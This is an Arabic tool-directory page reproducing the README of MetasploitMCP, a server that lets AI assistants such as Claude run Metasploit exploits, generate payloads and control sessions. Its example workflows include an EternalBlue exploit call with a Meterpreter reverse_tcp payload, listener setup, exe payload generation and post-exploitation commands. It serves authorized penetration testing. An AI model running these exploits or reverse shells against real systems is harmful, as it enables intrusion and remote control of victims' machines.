Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MetasploitMCP — خادم MCP لـ Metasploit | Kitploit
أدوات/GitHubGitHub/gh05tcrew/metasploitmcp
أطر اختبار الاختراقأطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعدتوليد شيفرة القشرة
70720054منذ 7 أشهرتمت المراجعة من قبل Kitploit
GitHub
gh05tcrew/metasploitmcp

MetasploitMCP

خادم MCP لـ Metasploit

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Metasploit MCP Server

خادم Model Context Protocol (MCP) لتكامل إطار عمل Metasploit Framework.

https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1

الوصف

يوفر خادم MCP هذا جسرًا بين نماذج اللغة الكبيرة مثل Claude ومنصة اختبار الاختراق Metasploit Framework. يسمح للمساعدين الأذكياء بالوصول إلى وظائف Metasploit والتحكم فيها ديناميكيًا من خلال أدوات موحّدة، ما يتيح واجهة لغة طبيعية لسير عمل اختبار الأمان المعقدة.

الميزات

معلومات الوحدات

  • list_exploits: البحث في وحدات استغلال Metasploit المتاحة وسردها
  • list_payloads: البحث في وحدات الحمولة المتاحة وسردها مع ترشيح اختياري حسب المنصة والمعمارية

سير عمل الاستغلال

  • run_exploit: تكوين وتنفيذ استغلال ضد هدف مع خيارات لتنفيذ الفحوصات أولًا
  • run_auxiliary_module: تشغيل أي وحدة مساعدة من Metasploit مع خيارات مخصصة
  • run_post_module: تنفيذ وحدات ما بعد الاستغلال ضد الجلسات الحالية

توليد الحمولات

  • generate_payload: توليد ملفات الحمولات باستخدام Metasploit RPC (يحفظ الملفات محليًا)

إدارة الجلسات

تنزيل الأداة
  • list_active_sessions: عرض جلسات Metasploit الحالية مع معلومات تفصيلية
  • send_session_command: تشغيل أمر في جلسة shell أو Meterpreter نشطة
  • terminate_session: إنهاء جلسة نشطة قسريًا

إدارة المعالجات

  • list_listeners: عرض جميع المعالجات النشطة والمهام الخلفية
  • start_listener: إنشاء multi/handler جديد لاستقبال الاتصالات
  • stop_job: إنهاء أي مهمة أو معالج قيد التشغيل

المتطلبات الأساسية

  • تثبيت Metasploit Framework وتشغيل msfrpcd
  • Python 3.10 أو أحدث
  • حزم Python المطلوبة (انظر requirements.txt)

التثبيت

  1. استنساخ هذا المستودع
  2. تثبيت التبعيات:
    root@kitploit:~
    pip install -r requirements.txt
    
  3. تكوين متغيرات البيئة (اختياري):
    root@kitploit:~
    MSF_PASSWORD=yourpassword
    MSF_SERVER=127.0.0.1
    MSF_PORT=55553
    MSF_SSL=false
    PAYLOAD_SAVE_DIR=/path/to/save/payloads  # Optional: Where to save generated payloads
    

الاستخدام

شغّل خدمة Metasploit RPC:

root@kitploit:~
msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553

خيارات النقل

يدعم الخادم طريقتين للنقل:

  • HTTP/SSE (Server-Sent Events): الوضع الافتراضي للتوافق مع معظم عملاء MCP
  • STDIO (Standard Input/Output): يُستخدم مع Claude Desktop والوصلات المباشرة المماثلة

يمكنك تحديد وضع النقل صراحةً باستخدام الخيار --transport:

root@kitploit:~
# Run with HTTP/SSE transport (default)
python MetasploitMCP.py --transport http

# Run with STDIO transport
python MetasploitMCP.py --transport stdio

خيارات إضافية لوضع HTTP:

root@kitploit:~
python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085

التكامل مع Claude Desktop

للتكامل مع Claude Desktop، قم بتهيئة claude_desktop_config.json:

root@kitploit:~
{
    "mcpServers": {
        "metasploit": {
            "command": "uv",
            "args": [
                "--directory",
                "C:\\path\\to\\MetasploitMCP",
                "run",
                "MetasploitMCP.py",
                "--transport",
                "stdio"
            ],
            "env": {
                "MSF_PASSWORD": "yourpassword"
            }
        }
    }
}

عملاء MCP الآخرون

بالنسبة لعملاء MCP الآخرين الذين يستخدمون HTTP/SSE:

  1. شغّل الخادم في وضع HTTP:

    root@kitploit:~
    python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
    
  2. قم بتهيئة عميل MCP للاتصال بـ:

    • نقطة نهاية SSE: http://your-server-ip:8085/sse

اعتبارات الأمان

⚠️ تحذير أمني مهم:

توفر هذه الأداة وصولًا مباشرًا إلى قدرات Metasploit Framework، والتي تشمل ميزات استغلال قوية. استخدمها بمسؤولية وفقط في البيئات التي لديك فيها إذن صريح لإجراء اختبار الأمان.

  • تحقق دائمًا من جميع الأوامر وراجعها قبل التنفيذ
  • شغّلها فقط في بيئات اختبار معزولة أو بتفويض مناسب
  • كن على علم بأن أوامر ما بعد الاستغلال قد تؤدي إلى تعديلات كبيرة في النظام

أمثلة على سير العمل

استغلال أساسي

  1. سرد الاستغلالات المتاحة: list_exploits("ms17_010")
  2. تحديد وتشغيل استغلال: run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})
  3. سرد الجلسات: list_active_sessions()
  4. تشغيل الأوامر: send_session_command(1, "whoami")

ما بعد الاستغلال

  1. تشغيل وحدة ما بعد الاستغلال: run_post_module("windows/gather/enum_logged_on_users", 1)
  2. إرسال أوامر مخصصة: send_session_command(1, "sysinfo")
  3. إنهاء الجلسة عند الانتهاء: terminate_session(1)

إدارة المعالجات

  1. بدء مستمع: start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)
  2. سرد المعالجات النشطة: list_listeners()
  3. توليد حمولة: generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})
  4. إيقاف معالج: stop_job(1)

الاختبار

يتضمن هذا المشروع اختبارات وحدة وتكامل شاملة لضمان الموثوقية وقابلية الصيانة.

المتطلبات الأساسية للاختبار

تثبيت تبعيات الاختبار:

root@kitploit:~
pip install -r requirements-test.txt

أو استخدم المُثبّت المريح:

root@kitploit:~
python run_tests.py --install-deps
# OR
make install-deps

تشغيل الاختبارات

أوامر سريعة

root@kitploit:~
# Run all tests
python run_tests.py --all
# OR
make test

# Run with coverage report
python run_tests.py --all --coverage
# OR
make coverage

# Run with HTML coverage report
python run_tests.py --all --coverage --html
# OR
make coverage-html

مجموعات اختبار محددة

root@kitploit:~
# Unit tests only
python run_tests.py --unit
# OR
make test-unit

# Integration tests only  
python run_tests.py --integration
# OR
make test-integration

# Options parsing tests
python run_tests.py --options
# OR
make test-options

# Helper function tests
python run_tests.py --helpers
# OR
make test-helpers

# MCP tools tests
python run_tests.py --tools
# OR
make test-tools

خيارات الاختبار

root@kitploit:~
# Include slow tests
python run_tests.py --all --slow

# Include network tests (requires actual network)
python run_tests.py --all --network

# Verbose output
python run_tests.py --all --verbose

# Quick test (no coverage, fail fast)
make quick-test

# Debug mode (detailed failure info)
make test-debug

بنية الاختبارات

  • tests/test_options_parsing.py: اختبارات وحدة لوظيفة تحليل الخيارات المتسامحة
  • tests/test_helpers.py: اختبارات وحدة للدوال المساعدة الداخلية وإدارة عميل MSF
  • tests/test_tools_integration.py: اختبارات تكامل لجميع أدوات MCP مع خلفية Metasploit وهمية
  • conftest.py: إعدادات وتركيبات اختبار مشتركة
  • pytest.ini: إعدادات pytest مع خيارات التغطية

ميزات الاختبار

  • محاكاة شاملة: جميع تبعيات Metasploit مُحاكاة، لذا تعمل الاختبارات دون الحاجة إلى تثبيت MSF فعلي
  • دعم غير المتزامن: دعم كامل لاختبارات async/await باستخدام pytest-asyncio
  • تقارير التغطية: تحليل تغطية مفصل مع تقارير HTML
  • اختبارات مُعاملية: اختبار فعال لعدة سيناريوهات إدخال
  • إدارة التركيبات: تركيبات اختبار قابلة لإعادة الاستخدام لسيناريوهات الإعداد الشائعة

تقارير التغطية

بعد تشغيل الاختبارات مع التغطية، تتوفر التقارير في:

  • الطرفية: ملخص التغطية يُعرض بعد تشغيل الاختبار
  • HTML: htmlcov/index.html (عند استخدام خيار --html)

التكامل مع CI/CD

للتكامل المستمر:

root@kitploit:~
# CI-friendly test command
make ci-test
# OR
python run_tests.py --all --coverage --verbose

خيارات الإعداد

دليل حفظ الحمولات

بشكل افتراضي، تُحفظ الحمولات المولدة باستخدام generate_payload في دليل payloads داخل مجلد منزلك (~/payloads أو C:\Users\YourUsername\payloads). يمكنك تخصيص هذا الموقع عن طريق تعيين متغير البيئة PAYLOAD_SAVE_DIR.

تعيين متغير البيئة:

  • Windows (PowerShell):

    root@kitploit:~
    $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
    
  • Windows (Command Prompt):

    root@kitploit:~
    set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
    
  • Linux/macOS:

    root@kitploit:~
    export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
    
  • في إعداد Claude Desktop:

    root@kitploit:~
    "env": {
        "MSF_PASSWORD": "yourpassword",
        "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads"  // Only add if you want to override the default
    }
    

ملاحظة: إذا حددت مسارًا مخصصًا، فتأكد من وجوده أو أن التطبيق لديه إذن بإنشائه. إذا كان المسار غير صالح، فقد يفشل توليد الحمولة.

الترخيص

Apache 2.0